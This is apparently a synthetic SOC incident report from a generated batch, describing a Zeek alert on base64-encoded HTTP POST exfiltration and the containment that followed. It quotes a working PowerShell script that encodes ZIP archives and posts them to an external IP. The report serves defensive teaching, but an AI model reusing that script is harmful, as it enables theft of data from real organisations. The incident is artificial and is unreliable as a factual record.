Zeek Alert Details
Alert ID: ZEEK-DATA-ENCODING-1132-7842 Alert Time: 2024-02-29 10:30:22 EST Severity: HIGH (85/100) Source: Zeek (Bro) Network Security Monitor Rule: “Base64-Encoded Data in HTTP Requests – Potential Data Exfiltration” MITRE ATT&CK: T1132.001 – Data Encoding: Standard Encoding
Alert Details:
Detection: HTTP traffic containing large amounts of base64-encoded data
Source: 192.168.45.78 (ENG-WS-045 – Engineering) Destination: 185.143.221[.]89:80 Time: 10:15-10:30 EST
HTTP Requests:
10:15:22 – POST /upload.php (data length: 12,847 bytes, base64)
10:18:45 – POST /upload.php (data length: 14,231 bytes, base64)
10:22:12 – POST /upload.php (data length: 11,984 bytes, base64)
10:25:38 – POST /upload.php (data length: 13,562 bytes, base64)
10:28:55 – POST /upload.php (data length: 12,456 bytes, base64)
Data Analysis (Zeek extracted):
POST /upload.php HTTP/1.1
Host: 185.143.221[.]89
Content-Type: application/x-www-form-urlencoded
Content-Length: 12847
data=UEsDBBQAAAAIAICIF1Yj…
Decoded Data (base64):
5 ZIP archives
Each contains multiple files (documents, spreadsheets)
Total decoded size: ~45 MB
Detection Logic:
Multiple HTTP POST requests with large base64 payloads
Base64 encoding of binary data (ZIP files)
Destination IP known malicious
Pattern matches data encoding/exfiltration
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Zeek alert
Zeek Logs, Splunk
Confirmed base64-encoded exfiltration
2. Process Investigation
Identify process on endpoint
CrowdStrike Falcon
PowerShell script encoding and sending files
3. Data Analysis
Decode and analyze exfiltrated data
Base64 decoder, ZIP unpacker
45 MB of stolen documents (engineering IP)
4. Immediate Action
Isolate host
CrowdStrike
ENG-WS-045 quarantined
5. C2 Blocking
Block destination IP
Palo Alto
185.143.221[.]89 blocked
6. Data Protection
Determine what was stolen
File Audit Logs
47 files exfiltrated (source code, designs)
Jira Incident Report
Ticket: SOC-2024-150 Summary: T1132 – Data Exfiltration Using Base64 Encoding Status: RESOLVED Resolution: MALICIOUS – Data Exfiltrated, Host Isolated Priority: P2 – MEDIUM Labels: T1132, data-encoding, base64, exfiltration, zeek, compromised-account Components: Network-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zeek Network Security Monitor.
Alert: “Base64-Encoded Data in HTTP Requests – Potential Data Exfiltration”.
Source: ENG-WS-045 (Engineering, user rpatel).
Destination: 185.143.221[.]89:80.
Protocol: HTTP with base64-encoded payloads.
Time: 2024-02-29 10:30 EST.
Technique: MITRE ATT&CK T1132.001 – Data Encoding: Standard Encoding.
2. Technical Analysis:
Attack Chain:
09:30 – rpatel account compromised (phishing)
09:45 – Attacker logs into ENG-WS-045 via RDP
09:50 – Attacker collects sensitive files
09:55-10:10 – Attacker creates 5 ZIP archives
10:15-10:30 – Attacker exfiltrates via HTTP POST with base64 encoding
10:30 – Zeek detects
Encoding Technique:
Method: Base64 encoding of ZIP files
Purpose: Hide binary data in text-based protocol (HTTP)
Evasion: Bypass DLP that doesn’t inspect HTTP POST bodies
Volume: 5 POSTs, total 45 MB of original data
Exfiltrated Data:
Source code (Python, C++) – 12 files
Engineering designs (CAD) – 8 files
Project documentation – 15 files
Customer lists – 5 files
Password database – 1 file
VPN configurations – 6 files
Total: 47 files, 45 MB
Exfiltration Tool:
Process: powershell.exe
Script:
$files = Get-ChildItem C:\temp\data\*.zip
foreach ($file in $files) {
$bytes = [System.IO.File]::ReadAllBytes($file.FullName)
$b64 = [System.Convert]::ToBase64String($bytes)
$body = @{data=$b64} | ConvertTo-Json
Invoke-WebRequest -Uri http://185.143.221[.]89/upload.php -Method POST -Body $body
}
3. Investigation Findings:
Timeline:
09:30 – Account compromised
09:45 – Attacker logs in
09:50-10:10 – Data collection and archiving
10:15-10:30 – Exfiltration
10:30 – Zeek alert
10:32 – SOC investigates
10:33 – Host isolated
10:34 – C2 blocked
Indicators of Compromise (IoCs):
Network:
– Destination: 185.143.221[.]89:80
– URI: /upload.php
– Pattern: HTTP POST with large base64 data
Files:
– C:\temp\data\*.zip (5 files, 45 MB total)
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked destination IP at firewall.
Terminated exfiltration process.
Disabled rpatel account.
Reset password.
Data Protection:
Determined scope of exfiltrated data (47 files, 45 MB).
Notified affected data owners.
Initiated incident response for data breach.
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data theft.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
DLP did not inspect HTTP POST bodies.
6. Business Impact:
Operational Impact: Engineering host offline.
Data Exposure: 45 MB of sensitive IP (source code, designs, customer data) exfiltrated.
Regulatory Impact: Potential GDPR breach (customer data).
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Host isolated.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented DLP inspection of HTTP POST bodies.
Enhanced Zeek signatures for base64 detection.
8. Conclusion:
An attacker compromised an engineering account and exfiltrated 45 MB of intellectual property using base64 encoding over HTTP. Zeek detected the encoded data pattern, but exfiltration had already occurred. The host was isolated and the account secured.
Closure Rationale: Data exfiltrated; exfiltration stopped; account secured; breach response initiated.
Analyst: [Your Name], SOC Analyst Date: 2024-02-29 11:30 EST
End of Batch 22
Ready for your next batch of prompts whenever you are.
Batch 23: Command and Control & Exfiltration Incident Reports
Here are the next 5 detailed SOC incident reports.